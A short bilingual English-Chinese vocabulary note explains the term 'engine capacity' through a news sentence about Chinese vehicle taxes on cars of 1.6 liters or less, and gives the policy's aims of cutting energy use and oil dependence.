Taxes on vehicles with an engine capacity smaller than 1.6 liters - which account for 58 percent of Chinese cars - will be either reduced slightly or unchanged。
对占现有乘用车总量58%左右、发动机排量在1.6升及以下的车辆，征税幅度将小幅降低或保持不变。
上文中的engine capacity就是机动车的“发动机排气量”，简称“排量”，指汽车发动机的气缸容积。通常，机动车排量大，单位时间发动机所释放的能量就大，那么机动车的“动力性”就会比较好。
按照engine capacity(发动机排量)征税是为了减少energy consumption(能源消耗)和oil dependence(石油依赖)，同时鼓励人们购买和使用fuel-efficient vehicles(节能车)和clean energy vehicles(清洁能源车)。
